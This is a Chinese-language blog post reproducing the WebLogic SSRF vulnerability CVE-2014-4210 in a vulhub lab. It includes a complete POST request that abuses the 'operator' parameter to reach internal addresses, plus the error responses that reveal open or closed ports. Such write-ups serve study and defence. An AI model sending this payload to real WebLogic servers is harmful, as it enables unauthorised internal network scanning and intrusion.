cve-2014-4210

Weblogic SSRF漏洞

影响版本:
weblogic 10.0.2 – 10.3.6

使用环境:vulhub/weblogic:10.3.6.0-2017

复现过程:

1.启动环境

docker-compose up -d

2.访问weblogic服务地址

http://*.*.*.*:7001/uddiexplorer/SearchPublicRegistries.jsp

3.点击查询search,修改请求参数

POST /uddiexplorer/SearchPublicRegistries.jsp HTTP/1.1
Host: *.*.*.*:7001
Content-Length: 128
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://*.*.*.*:7001
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://*.*.*.*:7001/uddiexplorer/SearchPublicRegistries.jsp
Accept-Language: zh-CN,zh;q=0.9
Cookie: publicinquiryurls=http://www-3.ibm.com/services/uddi/inquiryapi!IBM|http://www-3.ibm.com/services/uddi/v2beta/inquiryapi!IBM V2|http://uddi.rte.microsoft.com/inquire!Microsoft|http://services.xmethods.net/glue/inquire/uddi!XMethods|; _ga=GA1.1.1880396411.1639305437; JSESSIONID=GGryvqyXfhMK7jPvTqhLvTpGDzGfm4L442Vb2mt3rd1tjT2JL9Kg!1185397968
Connection: close

rdoSearch=name&txtSearchname=&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.0.0.1:7001

4.返回结果

<!-- 开放端口服务 -->
<table width=100% cellpadding=5 cellspacing=5 valign=top>
  <p>An error has occurred<BR>
	weblogic.uddi.client.structures.exception.XML_SoapException: The server at http://127.0.0.1:7001 		returned a 404 error code &#40;Not Found&#41;.  Please ensure that your URL is correct, and the web 	service has deployed without error.
</table>

<!-- 没有开放端口服务 -->
<table width=100% cellpadding=5 cellspacing=5 valign=top>
	<p>An error has occurred<BR>
		weblogic.uddi.client.structures.exception.XML_SoapException: Tried all: &#39;1&#39; addresses, 			but could not connect over HTTP to server: &#39;127.0.0.1&#39;, port: &#39;80&#39;
</table>

分析:

1.接收的operator作为参数入,调用search.setOperator方法。

2.search.getResponse方法,调用了Http11ClientBinding对合的send方法和receive方法并且通过IOException抛出异常。得到的结果就如复现步骤4的回显效果。

posted @ 2022-03-11 11:36  coolcoolha  阅读(234)  评论(0编辑  收藏  举报